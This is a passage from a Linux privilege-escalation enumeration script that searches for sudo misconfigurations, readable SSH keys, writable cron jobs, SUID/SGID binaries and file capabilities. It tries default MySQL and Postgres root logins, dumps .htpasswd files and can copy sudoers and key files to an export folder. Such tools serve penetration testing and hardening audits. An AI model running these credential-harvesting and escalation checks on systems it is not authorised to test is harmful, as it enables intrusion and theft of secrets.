account(s):\\e[00m\\n$superman\"\n echo -e \"\\n\"\nfi\n\n#pull out vital sudoers info\nsudoers=`grep -v -e '^$' /etc/sudoers 2>/dev/null |grep -v \"#\" 2>/dev/null`\nif [ \"$sudoers\" ]; then\n echo -e \"\\e[00;31m[-] Sudoers configuration (condensed):\\e[00m$sudoers\"\n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$sudoers\" ]; then\n mkdir $format/etc-export/ 2>/dev/null\n cp /etc/sudoers $format/etc-export/sudoers 2>/dev/null\nfi\n\n#can we sudo without supplying a password\nsudoperms=`echo '' | sudo -S -l -k 2>/dev/null`\nif [ \"$sudoperms\" ]; then\n echo -e \"\\e[00;33m[+] We can sudo without supplying a password!\\e[00m\\n$sudoperms\" \n echo -e \"\\n\"\nfi\n\n#check sudo perms - authenticated\nif [ \"$sudopass\" ]; then\n if [ \"$sudoperms\" ]; then\n :\n else\n sudoauth=`echo $userpassword | sudo -S -l -k 2>/dev/null`\n if [ \"$sudoauth\" ]; then\n echo -e \"\\e[00;33m[+] We can sudo when supplying a password!\\e[00m\\n$sudoauth\" \n echo -e \"\\n\"\n fi\n fi\nfi\n\n##known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values) - authenticated\nif [ \"$sudopass\" ]; then\n if [ \"$sudoperms\" ]; then\n :\n else\n sudopermscheck=`echo $userpassword | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null|sed 's/,*$//g' 2>/dev/null | grep -w $binarylist 2>/dev/null`\n if [ \"$sudopermscheck\" ]; then\n echo -e \"\\e[00;33m[-] Possible sudo pwnage!\\e[00m\\n$sudopermscheck\" \n echo -e \"\\n\"\n fi\n fi\nfi\n\n#known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values)\nsudopwnage=`echo '' | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null | sed 's/,*$//g' 2>/dev/null | grep -w $binarylist 2>/dev/null`\nif [ \"$sudopwnage\" ]; then\n echo -e \"\\e[00;33m[+] Possible sudo pwnage!\\e[00m\\n$sudopwnage\" \n echo -e \"\\n\"\nfi\n\n#who has sudoed in the past\nwhohasbeensudo=`find /home -name .sudo_as_admin_successful 2>/dev/null`\nif [ \"$whohasbeensudo\" ]; then\n echo -e \"\\e[00;31m[-] Accounts that have recently used sudo:\\e[00m\\n$whohasbeensudo\" \n echo -e \"\\n\"\nfi\n\n#checks to see if roots home directory is accessible\nrthmdir=`ls -ahl /root/ 2>/dev/null`\nif [ \"$rthmdir\" ]; then\n echo -e \"\\e[00;33m[+] We can read root's home directory!\\e[00m\\n$rthmdir\" \n echo -e \"\\n\"\nfi\n\n#displays /home directory permissions - check if any are lax\nhomedirperms=`ls -ahl /home/ 2>/dev/null`\nif [ \"$homedirperms\" ]; then\n echo -e \"\\e[00;31m[-] Are permissions on /home directories lax:\\e[00m\\n$homedirperms\" \n echo -e \"\\n\"\nfi\n\n#looks for files we can write to that don't belong to us\nif [ \"$thorough\" = \"1\" ]; then\n grfilesall=`find / -writable ! -user \\`whoami\\` -type f ! -path \"/proc/*\" ! -path \"/sys/*\" -exec ls -al {} \\; 2>/dev/null`\n if [ \"$grfilesall\" ]; then\n echo -e \"\\e[00;31m[-] Files not owned by user but writable by group:\\e[00m\\n$grfilesall\" \n echo -e \"\\n\"\n fi\nfi\n\n#looks for files that belong to us\nif [ \"$thorough\" = \"1\" ]; then\n ourfilesall=`find / -user \\`whoami\\` -type f ! -path \"/proc/*\" ! -path \"/sys/*\" -exec ls -al {} \\; 2>/dev/null`\n if [ \"$ourfilesall\" ]; then\n echo -e \"\\e[00;31m[-] Files owned by our user:\\e[00m\\n$ourfilesall\"\n echo -e \"\\n\"\n fi\nfi\n\n#looks for hidden files\nif [ \"$thorough\" = \"1\" ]; then\n hiddenfiles=`find / -name \".*\" -type f ! -path \"/proc/*\" ! -path \"/sys/*\" -exec ls -al {} \\; 2>/dev/null`\n if [ \"$hiddenfiles\" ]; then\n echo -e \"\\e[00;31m[-] Hidden files:\\e[00m\\n$hiddenfiles\"\n echo -e \"\\n\"\n fi\nfi\n\n#looks for world-reabable files within /home - depending on number of /home dirs & files, this can take some time so is only 'activated' with thorough scanning switch\nif [ \"$thorough\" = \"1\" ]; then\nwrfileshm=`find /home/ -perm -4 -type f -exec ls -al {} \\; 2>/dev/null`\n\tif [ \"$wrfileshm\" ]; then\n\t\techo -e \"\\e[00;31m[-] World-readable files within /home:\\e[00m\\n$wrfileshm\" \n\t\techo -e \"\\n\"\n\tfi\nfi\n\nif [ \"$thorough\" = \"1\" ]; then\n\tif [ \"$export\" ] && [ \"$wrfileshm\" ]; then\n\t\tmkdir $format/wr-files/ 2>/dev/null\n\t\tfor i in $wrfileshm; do cp --parents $i $format/wr-files/ ; done 2>/dev/null\n\tfi\nfi\n\n#lists current user's home directory contents\nif [ \"$thorough\" = \"1\" ]; then\nhomedircontents=`ls -ahl ~ 2>/dev/null`\n\tif [ \"$homedircontents\" ] ; then\n\t\techo -e \"\\e[00;31m[-] Home directory contents:\\e[00m\\n$homedircontents\" \n\t\techo -e \"\\n\" \n\tfi\nfi\n\n#checks for if various ssh files are accessible - this can take some time so is only 'activated' with thorough scanning switch\nif [ \"$thorough\" = \"1\" ]; then\nsshfiles=`find / \\( -name \"id_dsa*\" -o -name \"id_rsa*\" -o -name \"known_hosts\" -o -name \"authorized_hosts\" -o -name \"authorized_keys\" \\) -exec ls -la {} 2>/dev/null \\;`\n\tif [ \"$sshfiles\" ]; then\n\t\techo -e \"\\e[00;31m[-] SSH keys/host information found in the following locations:\\e[00m\\n$sshfiles\" \n\t\techo -e \"\\n\"\n\tfi\nfi\n\nif [ \"$thorough\" = \"1\" ]; then\n\tif [ \"$export\" ] && [ \"$sshfiles\" ]; then\n\t\tmkdir $format/ssh-files/ 2>/dev/null\n\t\tfor i in $sshfiles; do cp --parents $i $format/ssh-files/; done 2>/dev/null\n\tfi\nfi\n\n#is root permitted to login via ssh\nsshrootlogin=`grep \"PermitRootLogin \" /etc/ssh/sshd_config 2>/dev/null | grep -v \"#\" | awk '{print $2}'`\nif [ \"$sshrootlogin\" = \"yes\" ]; then\n echo -e \"\\e[00;31m[-] Root is allowed to login via SSH:\\e[00m\" ; grep \"PermitRootLogin \" /etc/ssh/sshd_config 2>/dev/null | grep -v \"#\" \n echo -e \"\\n\"\nfi\n}\n\nenvironmental_info()\n{\necho -e \"\\e[00;33m### ENVIRONMENTAL #######################################\\e[00m\" \n\n#env information\nenvinfo=`env 2>/dev/null | grep -v 'LS_COLORS' 2>/dev/null`\nif [ \"$envinfo\" ]; then\n echo -e \"\\e[00;31m[-] Environment information:\\e[00m\\n$envinfo\" \n echo -e \"\\n\"\nfi\n\n#check if selinux is enabled\nsestatus=`sestatus 2>/dev/null`\nif [ \"$sestatus\" ]; then\n echo -e \"\\e[00;31m[-] SELinux seems to be present:\\e[00m\\n$sestatus\"\n echo -e \"\\n\"\nfi\n\n#phackt\n\n#current path configuration\npathinfo=`echo $PATH 2>/dev/null`\nif [ \"$pathinfo\" ]; then\n pathswriteable=`ls -ld $(echo $PATH | tr \":\" \" \")`\n echo -e \"\\e[00;31m[-] Path information:\\e[00m\\n$pathinfo\" \n echo -e \"$pathswriteable\"\n echo -e \"\\n\"\nfi\n\n#lists available shells\nshellinfo=`cat /etc/shells 2>/dev/null`\nif [ \"$shellinfo\" ]; then\n echo -e \"\\e[00;31m[-] Available shells:\\e[00m\\n$shellinfo\" \n echo -e \"\\n\"\nfi\n\n#current umask value with both octal and symbolic output\numaskvalue=`umask -S 2>/dev/null & umask 2>/dev/null`\nif [ \"$umaskvalue\" ]; then\n echo -e \"\\e[00;31m[-] Current umask value:\\e[00m\\n$umaskvalue\" \n echo -e \"\\n\"\nfi\n\n#umask value as in /etc/login.defs\numaskdef=`grep -i \"^UMASK\" /etc/login.defs 2>/dev/null`\nif [ \"$umaskdef\" ]; then\n echo -e \"\\e[00;31m[-] umask value as specified in /etc/login.defs:\\e[00m\\n$umaskdef\" \n echo -e \"\\n\"\nfi\n\n#password policy information as stored in /etc/login.defs\nlogindefs=`grep \"^PASS_MAX_DAYS\\|^PASS_MIN_DAYS\\|^PASS_WARN_AGE\\|^ENCRYPT_METHOD\" /etc/login.defs 2>/dev/null`\nif [ \"$logindefs\" ]; then\n echo -e \"\\e[00;31m[-] Password and storage information:\\e[00m\\n$logindefs\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$logindefs\" ]; then\n mkdir $format/etc-export/ 2>/dev/null\n cp /etc/login.defs $format/etc-export/login.defs 2>/dev/null\nfi\n}\n\njob_info()\n{\necho -e \"\\e[00;33m### JOBS/TASKS ##########################################\\e[00m\" \n\n#are there any cron jobs configured\ncronjobs=`ls -la /etc/cron* 2>/dev/null`\nif [ \"$cronjobs\" ]; then\n echo -e \"\\e[00;31m[-] Cron jobs:\\e[00m\\n$cronjobs\" \n echo -e \"\\n\"\nfi\n\n#can we manipulate these jobs in any way\ncronjobwwperms=`find /etc/cron* -perm -0002 -type f -exec ls -la {} \\; -exec cat {} 2>/dev/null \\;`\nif [ \"$cronjobwwperms\" ]; then\n echo -e \"\\e[00;33m[+] World-writable cron jobs and file contents:\\e[00m\\n$cronjobwwperms\" \n echo -e \"\\n\"\nfi\n\n#contab contents\ncrontabvalue=`cat /etc/crontab 2>/dev/null`\nif [ \"$crontabvalue\" ]; then\n echo -e \"\\e[00;31m[-] Crontab contents:\\e[00m\\n$crontabvalue\" \n echo -e \"\\n\"\nfi\n\ncrontabvar=`ls -la /var/spool/cron/crontabs 2>/dev/null`\nif [ \"$crontabvar\" ]; then\n echo -e \"\\e[00;31m[-] Anything interesting in /var/spool/cron/crontabs:\\e[00m\\n$crontabvar\" \n echo -e \"\\n\"\nfi\n\nanacronjobs=`ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null`\nif [ \"$anacronjobs\" ]; then\n echo -e \"\\e[00;31m[-] Anacron jobs and associated file permissions:\\e[00m\\n$anacronjobs\" \n echo -e \"\\n\"\nfi\n\nanacrontab=`ls -la /var/spool/anacron 2>/dev/null`\nif [ \"$anacrontab\" ]; then\n echo -e \"\\e[00;31m[-] When were jobs last executed (/var/spool/anacron contents):\\e[00m\\n$anacrontab\" \n echo -e \"\\n\"\nfi\n\n#pull out account names from /etc/passwd and see if any users have associated cronjobs (priv command)\ncronother=`cut -d \":\" -f 1 /etc/passwd | xargs -n1 crontab -l -u 2>/dev/null`\nif [ \"$cronother\" ]; then\n echo -e \"\\e[00;31m[-] Jobs held by all users:\\e[00m\\n$cronother\" \n echo -e \"\\n\"\nfi\n\n# list systemd timers\nif [ \"$thorough\" = \"1\" ]; then\n # include inactive timers in thorough mode\n systemdtimers=\"$(systemctl list-timers --all 2>/dev/null)\"\n info=\"\"\nelse\n systemdtimers=\"$(systemctl list-timers 2>/dev/null |head -n -1 2>/dev/null)\"\n # replace the info in the output with a hint towards thorough mode\n info=\"\\e[2mEnable thorough tests to see inactive timers\\e[00m\"\nfi\nif [ \"$systemdtimers\" ]; then\n echo -e \"\\e[00;31m[-] Systemd timers:\\e[00m\\n$systemdtimers\\n$info\"\n echo -e \"\\n\"\nfi\n\n}\n\nnetworking_info()\n{\necho -e \"\\e[00;33m### NETWORKING ##########################################\\e[00m\" \n\n#nic information\nnicinfo=`/sbin/ifconfig -a 2>/dev/null`\nif [ \"$nicinfo\" ]; then\n echo -e \"\\e[00;31m[-] Network and IP info:\\e[00m\\n$nicinfo\" \n echo -e \"\\n\"\nfi\n\n#nic information (using ip)\nnicinfoip=`/sbin/ip a 2>/dev/null`\nif [ ! \"$nicinfo\" ] && [ \"$nicinfoip\" ]; then\n echo -e \"\\e[00;31m[-] Network and IP info:\\e[00m\\n$nicinfoip\" \n echo -e \"\\n\"\nfi\n\narpinfo=`arp -a 2>/dev/null`\nif [ \"$arpinfo\" ]; then\n echo -e \"\\e[00;31m[-] ARP history:\\e[00m\\n$arpinfo\" \n echo -e \"\\n\"\nfi\n\narpinfoip=`ip n 2>/dev/null`\nif [ ! \"$arpinfo\" ] && [ \"$arpinfoip\" ]; then\n echo -e \"\\e[00;31m[-] ARP history:\\e[00m\\n$arpinfoip\" \n echo -e \"\\n\"\nfi\n\n#dns settings\nnsinfo=`grep \"nameserver\" /etc/resolv.conf 2>/dev/null`\nif [ \"$nsinfo\" ]; then\n echo -e \"\\e[00;31m[-] Nameserver(s):\\e[00m\\n$nsinfo\" \n echo -e \"\\n\"\nfi\n\nnsinfosysd=`systemd-resolve --status 2>/dev/null`\nif [ \"$nsinfosysd\" ]; then\n echo -e \"\\e[00;31m[-] Nameserver(s):\\e[00m\\n$nsinfosysd\" \n echo -e \"\\n\"\nfi\n\n#default route configuration\ndefroute=`route 2>/dev/null | grep default`\nif [ \"$defroute\" ]; then\n echo -e \"\\e[00;31m[-] Default route:\\e[00m\\n$defroute\" \n echo -e \"\\n\"\nfi\n\n#default route configuration\ndefrouteip=`ip r 2>/dev/null | grep default`\nif [ ! \"$defroute\" ] && [ \"$defrouteip\" ]; then\n echo -e \"\\e[00;31m[-] Default route:\\e[00m\\n$defrouteip\" \n echo -e \"\\n\"\nfi\n\n#listening TCP\ntcpservs=`netstat -ntpl 2>/dev/null`\nif [ \"$tcpservs\" ]; then\n echo -e \"\\e[00;31m[-] Listening TCP:\\e[00m\\n$tcpservs\" \n echo -e \"\\n\"\nfi\n\ntcpservsip=`ss -t -l -n 2>/dev/null`\nif [ ! \"$tcpservs\" ] && [ \"$tcpservsip\" ]; then\n echo -e \"\\e[00;31m[-] Listening TCP:\\e[00m\\n$tcpservsip\" \n echo -e \"\\n\"\nfi\n\n#listening UDP\nudpservs=`netstat -nupl 2>/dev/null`\nif [ \"$udpservs\" ]; then\n echo -e \"\\e[00;31m[-] Listening UDP:\\e[00m\\n$udpservs\" \n echo -e \"\\n\"\nfi\n\nudpservsip=`ss -u -l -n 2>/dev/null`\nif [ ! \"$udpservs\" ] && [ \"$udpservsip\" ]; then\n echo -e \"\\e[00;31m[-] Listening UDP:\\e[00m\\n$udpservsip\" \n echo -e \"\\n\"\nfi\n}\n\nservices_info()\n{\necho -e \"\\e[00;33m### SERVICES #############################################\\e[00m\" \n\n#running processes\npsaux=`ps aux 2>/dev/null`\nif [ \"$psaux\" ]; then\n echo -e \"\\e[00;31m[-] Running processes:\\e[00m\\n$psaux\" \n echo -e \"\\n\"\nfi\n\n#lookup process binary path and permissisons\nprocperm=`ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null`\nif [ \"$procperm\" ]; then\n echo -e \"\\e[00;31m[-] Process binaries and associated permissions (from above list):\\e[00m\\n$procperm\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$procperm\" ]; then\nprocpermbase=`ps aux 2>/dev/null | awk '{print $11}' | xargs -r ls 2>/dev/null | awk '!x[$0]++' 2>/dev/null`\n mkdir $format/ps-export/ 2>/dev/null\n for i in $procpermbase; do cp --parents $i $format/ps-export/; done 2>/dev/null\nfi\n\n#anything 'useful' in inetd.conf\ninetdread=`cat /etc/inetd.conf 2>/dev/null`\nif [ \"$inetdread\" ]; then\n echo -e \"\\e[00;31m[-] Contents of /etc/inetd.conf:\\e[00m\\n$inetdread\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$inetdread\" ]; then\n mkdir $format/etc-export/ 2>/dev/null\n cp /etc/inetd.conf $format/etc-export/inetd.conf 2>/dev/null\nfi\n\n#very 'rough' command to extract associated binaries from inetd.conf & show permisisons of each\ninetdbinperms=`awk '{print $7}' /etc/inetd.conf 2>/dev/null |xargs -r ls -la 2>/dev/null`\nif [ \"$inetdbinperms\" ]; then\n echo -e \"\\e[00;31m[-] The related inetd binary permissions:\\e[00m\\n$inetdbinperms\" \n echo -e \"\\n\"\nfi\n\nxinetdread=`cat /etc/xinetd.conf 2>/dev/null`\nif [ \"$xinetdread\" ]; then\n echo -e \"\\e[00;31m[-] Contents of /etc/xinetd.conf:\\e[00m\\n$xinetdread\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$xinetdread\" ]; then\n mkdir $format/etc-export/ 2>/dev/null\n cp /etc/xinetd.conf $format/etc-export/xinetd.conf 2>/dev/null\nfi\n\nxinetdincd=`grep \"/etc/xinetd.d\" /etc/xinetd.conf 2>/dev/null`\nif [ \"$xinetdincd\" ]; then\n echo -e \"\\e[00;31m[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:\\e[00m\"; ls -la /etc/xinetd.d 2>/dev/null \n echo -e \"\\n\"\nfi\n\n#very 'rough' command to extract associated binaries from xinetd.conf & show permisisons of each\nxinetdbinperms=`awk '{print $7}' /etc/xinetd.conf 2>/dev/null |xargs -r ls -la 2>/dev/null`\nif [ \"$xinetdbinperms\" ]; then\n echo -e \"\\e[00;31m[-] The related xinetd binary permissions:\\e[00m\\n$xinetdbinperms\" \n echo -e \"\\n\"\nfi\n\ninitdread=`ls -la /etc/init.d 2>/dev/null`\nif [ \"$initdread\" ]; then\n echo -e \"\\e[00;31m[-] /etc/init.d/ binary permissions:\\e[00m\\n$initdread\" \n echo -e \"\\n\"\nfi\n\n#init.d files NOT belonging to root!\ninitdperms=`find /etc/init.d/ \\! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`\nif [ \"$initdperms\" ]; then\n echo -e \"\\e[00;31m[-] /etc/init.d/ files not belonging to root:\\e[00m\\n$initdperms\" \n echo -e \"\\n\"\nfi\n\nrcdread=`ls -la /etc/rc.d/init.d 2>/dev/null`\nif [ \"$rcdread\" ]; then\n echo -e \"\\e[00;31m[-] /etc/rc.d/init.d binary permissions:\\e[00m\\n$rcdread\" \n echo -e \"\\n\"\nfi\n\n#init.d files NOT belonging to root!\nrcdperms=`find /etc/rc.d/init.d \\! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`\nif [ \"$rcdperms\" ]; then\n echo -e \"\\e[00;31m[-] /etc/rc.d/init.d files not belonging to root:\\e[00m\\n$rcdperms\" \n echo -e \"\\n\"\nfi\n\nusrrcdread=`ls -la /usr/local/etc/rc.d 2>/dev/null`\nif [ \"$usrrcdread\" ]; then\n echo -e \"\\e[00;31m[-] /usr/local/etc/rc.d binary permissions:\\e[00m\\n$usrrcdread\" \n echo -e \"\\n\"\nfi\n\n#rc.d files NOT belonging to root!\nusrrcdperms=`find /usr/local/etc/rc.d \\! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`\nif [ \"$usrrcdperms\" ]; then\n echo -e \"\\e[00;31m[-] /usr/local/etc/rc.d files not belonging to root:\\e[00m\\n$usrrcdperms\" \n echo -e \"\\n\"\nfi\n\ninitread=`ls -la /etc/init/ 2>/dev/null`\nif [ \"$initread\" ]; then\n echo -e \"\\e[00;31m[-] /etc/init/ config file permissions:\\e[00m\\n$initread\"\n echo -e \"\\n\"\nfi\n\n# upstart scripts not belonging to root\ninitperms=`find /etc/init \\! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`\nif [ \"$initperms\" ]; then\n echo -e \"\\e[00;31m[-] /etc/init/ config files not belonging to root:\\e[00m\\n$initperms\"\n echo -e \"\\n\"\nfi\n\nsystemdread=`ls -lthR /lib/systemd/ 2>/dev/null`\nif [ \"$systemdread\" ]; then\n echo -e \"\\e[00;31m[-] /lib/systemd/* config file permissions:\\e[00m\\n$systemdread\"\n echo -e \"\\n\"\nfi\n\n# systemd files not belonging to root\nsystemdperms=`find /lib/systemd/ \\! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`\nif [ \"$systemdperms\" ]; then\n echo -e \"\\e[00;33m[+] /lib/systemd/* config files not belonging to root:\\e[00m\\n$systemdperms\"\n echo -e \"\\n\"\nfi\n}\n\nsoftware_configs()\n{\necho -e \"\\e[00;33m### SOFTWARE #############################################\\e[00m\" \n\n#sudo version - check to see if there are any known vulnerabilities with this\nsudover=`sudo -V 2>/dev/null| grep \"Sudo version\" 2>/dev/null`\nif [ \"$sudover\" ]; then\n echo -e \"\\e[00;31m[-] Sudo version:\\e[00m\\n$sudover\" \n echo -e \"\\n\"\nfi\n\n#mysql details - if installed\nmysqlver=`mysql --version 2>/dev/null`\nif [ \"$mysqlver\" ]; then\n echo -e \"\\e[00;31m[-] MYSQL version:\\e[00m\\n$mysqlver\" \n echo -e \"\\n\"\nfi\n\n#checks to see if root/root will get us a connection\nmysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null`\nif [ \"$mysqlconnect\" ]; then\n echo -e \"\\e[00;33m[+] We can connect to the local MYSQL service with default root/root credentials!\\e[00m\\n$mysqlconnect\" \n echo -e \"\\n\"\nfi\n\n#mysql version details\nmysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null`\nif [ \"$mysqlconnectnopass\" ]; then\n echo -e \"\\e[00;33m[+] We can connect to the local MYSQL service as 'root' and without a password!\\e[00m\\n$mysqlconnectnopass\" \n echo -e \"\\n\"\nfi\n\n#postgres details - if installed\npostgver=`psql -V 2>/dev/null`\nif [ \"$postgver\" ]; then\n echo -e \"\\e[00;31m[-] Postgres version:\\e[00m\\n$postgver\" \n echo -e \"\\n\"\nfi\n\n#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this\npostcon1=`psql -U postgres -w template0 -c 'select version()' 2>/dev/null | grep version`\nif [ \"$postcon1\" ]; then\n echo -e \"\\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\\e[00m\\n$postcon1\" \n echo -e \"\\n\"\nfi\n\npostcon11=`psql -U postgres -w template1 -c 'select version()' 2>/dev/null | grep version`\nif [ \"$postcon11\" ]; then\n echo -e \"\\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\\e[00m\\n$postcon11\" \n echo -e \"\\n\"\nfi\n\npostcon2=`psql -U pgsql -w template0 -c 'select version()' 2>/dev/null | grep version`\nif [ \"$postcon2\" ]; then\n echo -e \"\\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'psql' with no password!:\\e[00m\\n$postcon2\" \n echo -e \"\\n\"\nfi\n\npostcon22=`psql -U pgsql -w template1 -c 'select version()' 2>/dev/null | grep version`\nif [ \"$postcon22\" ]; then\n echo -e \"\\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'psql' with no password!:\\e[00m\\n$postcon22\" \n echo -e \"\\n\"\nfi\n\n#apache details - if installed\napachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null`\nif [ \"$apachever\" ]; then\n echo -e \"\\e[00;31m[-] Apache version:\\e[00m\\n$apachever\" \n echo -e \"\\n\"\nfi\n\n#what account is apache running under\napacheusr=`grep -i 'user\\|group' /etc/apache2/envvars 2>/dev/null |awk '{sub(/.*\\export /,\"\")}1' 2>/dev/null`\nif [ \"$apacheusr\" ]; then\n echo -e \"\\e[00;31m[-] Apache user configuration:\\e[00m\\n$apacheusr\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$apacheusr\" ]; then\n mkdir --parents $format/etc-export/apache2/ 2>/dev/null\n cp /etc/apache2/envvars $format/etc-export/apache2/envvars 2>/dev/null\nfi\n\n#installed apache modules\napachemodules=`apache2ctl -M 2>/dev/null; httpd -M 2>/dev/null`\nif [ \"$apachemodules\" ]; then\n echo -e \"\\e[00;31m[-] Installed Apache modules:\\e[00m\\n$apachemodules\" \n echo -e \"\\n\"\nfi\n\n#htpasswd check\nhtpasswd=`find / -name .htpasswd -print -exec cat {} \\; 2>/dev/null`\nif [ \"$htpasswd\" ]; then\n echo -e \"\\e[00;33m[-] htpasswd found - could contain passwords:\\e[00m\\n$htpasswd\"\n echo -e \"\\n\"\nfi\n\n#anything in the default http home dirs (a thorough only check as output can be large)\nif [ \"$thorough\" = \"1\" ]; then\n apachehomedirs=`ls -alhR /var/www/ 2>/dev/null; ls -alhR /srv/www/htdocs/ 2>/dev/null; ls -alhR /usr/local/www/apache2/data/ 2>/dev/null; ls -alhR /opt/lampp/htdocs/ 2>/dev/null`\n if [ \"$apachehomedirs\" ]; then\n echo -e \"\\e[00;31m[-] www home dir contents:\\e[00m\\n$apachehomedirs\" \n echo -e \"\\n\"\n fi\nfi\n\n}\n\ninteresting_files()\n{\necho -e \"\\e[00;33m### INTERESTING FILES ####################################\\e[00m\" \n\n#checks to see if various files are installed\necho -e \"\\e[00;31m[-] Useful file locations:\\e[00m\" ; which nc 2>/dev/null ; which netcat 2>/dev/null ; which wget 2>/dev/null ; which nmap 2>/dev/null ; which gcc 2>/dev/null; which curl 2>/dev/null \necho -e \"\\n\" \n\n#limited search for installed compilers\ncompiler=`dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null`\nif [ \"$compiler\" ]; then\n echo -e \"\\e[00;31m[-] Installed compilers:\\e[00m\\n$compiler\" \n echo -e \"\\n\"\nfi\n\n#manual check - lists out sensitive files, can we read/modify etc.\necho -e \"\\e[00;31m[-] Can we read/write sensitive files:\\e[00m\" ; ls -la /etc/passwd 2>/dev/null ; ls -la /etc/group 2>/dev/null ; ls -la /etc/profile 2>/dev/null; ls -la /etc/shadow 2>/dev/null ; ls -la /etc/master.passwd 2>/dev/null \necho -e \"\\n\" \n\n#search for suid files\nallsuid=`find / -perm -4000 -type f 2>/dev/null`\nfindsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} 2>/dev/null \\;`\nif [ \"$findsuid\" ]; then\n echo -e \"\\e[00;31m[-] SUID files:\\e[00m\\n$findsuid\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$findsuid\" ]; then\n mkdir $format/suid-files/ 2>/dev/null\n for i in $findsuid; do cp $i $format/suid-files/; done 2>/dev/null\nfi\n\n#list of 'interesting' suid files - feel free to make additions\nintsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} \\; 2>/dev/null | grep -w $binarylist 2>/dev/null`\nif [ \"$intsuid\" ]; then\n echo -e \"\\e[00;33m[+] Possibly interesting SUID files:\\e[00m\\n$intsuid\" \n echo -e \"\\n\"\nfi\n\n#lists world-writable suid files\nwwsuid=`find $allsuid -perm -4002 -type f -exec ls -la {} 2>/dev/null \\;`\nif [ \"$wwsuid\" ]; then\n echo -e \"\\e[00;33m[+] World-writable SUID files:\\e[00m\\n$wwsuid\" \n echo -e \"\\n\"\nfi\n\n#lists world-writable suid files owned by root\nwwsuidrt=`find $allsuid -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \\;`\nif [ \"$wwsuidrt\" ]; then\n echo -e \"\\e[00;33m[+] World-writable SUID files owned by root:\\e[00m\\n$wwsuidrt\" \n echo -e \"\\n\"\nfi\n\n#search for sgid files\nallsgid=`find / -perm -2000 -type f 2>/dev/null`\nfindsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} 2>/dev/null \\;`\nif [ \"$findsgid\" ]; then\n echo -e \"\\e[00;31m[-] SGID files:\\e[00m\\n$findsgid\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$findsgid\" ]; then\n mkdir $format/sgid-files/ 2>/dev/null\n for i in $findsgid; do cp $i $format/sgid-files/; done 2>/dev/null\nfi\n\n#list of 'interesting' sgid files\nintsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} \\; 2>/dev/null | grep -w $binarylist 2>/dev/null`\nif [ \"$intsgid\" ]; then\n echo -e \"\\e[00;33m[+] Possibly interesting SGID files:\\e[00m\\n$intsgid\" \n echo -e \"\\n\"\nfi\n\n#lists world-writable sgid files\nwwsgid=`find $allsgid -perm -2002 -type f -exec ls -la {} 2>/dev/null \\;`\nif [ \"$wwsgid\" ]; then\n echo -e \"\\e[00;33m[+] World-writable SGID files:\\e[00m\\n$wwsgid\" \n echo -e \"\\n\"\nfi\n\n#lists world-writable sgid files owned by root\nwwsgidrt=`find $allsgid -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \\;`\nif [ \"$wwsgidrt\" ]; then\n echo -e \"\\e[00;33m[+] World-writable SGID files owned by root:\\e[00m\\n$wwsgidrt\" \n echo -e \"\\n\"\nfi\n\n#list all files with POSIX capabilities set along with there capabilities\nfileswithcaps=`getcap -r / 2>/dev/null || /sbin/getcap -r / 2>/dev/null`\nif [ \"$fileswithcaps\" ]; then\n echo -e \"\\e[00;31m[+] Files with POSIX capabilities set:\\e[00m\\n$fileswithcaps\"\n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$fileswithcaps\" ]; then\n mkdir $format/files_with_capabilities/ 2>/dev/null\n for i in $fileswithcaps; do cp $i $format/files_with_capabilities/; done 2>/dev/null\nfi\n\n#searches /etc/security/capability.conf for users associated capapilies\nuserswithcaps=`grep -v '^#\\|none\\|^$' /etc/security/capability.conf 2>/dev/null`\nif [ \"$userswithcaps\" ]; then\n echo -e \"\\e[00;33m[+] Users with specific POSIX capabilities:\\e[00m\\n$userswithcaps\"\n echo -e \"\\n\"\nfi\n\nif [ \"$userswithcaps\" ] ; then\n#matches the capabilities found associated with users with the current user\nmatchedcaps=`echo -e \"$userswithcaps\" | grep \\`whoami\\` | awk '{print $1}' 2>/dev/null`\n\tif [ \"$matchedcaps\" ]; then\n\t\techo -e \"\\e[00;33m[+] Capabilities associated with the current user:\\e[00m\\n$matchedcaps\"\n\t\techo -e \"\\n\"\n\t\t#matches the files with capapbilities with capabilities associated with the current user\n\t\tmatchedfiles=`echo -e \"$matchedcaps\" | while read -r cap ; do echo -e \"$fileswithcaps\" | grep \"$cap\" ; done 2>/dev/null`\n\t\tif [ 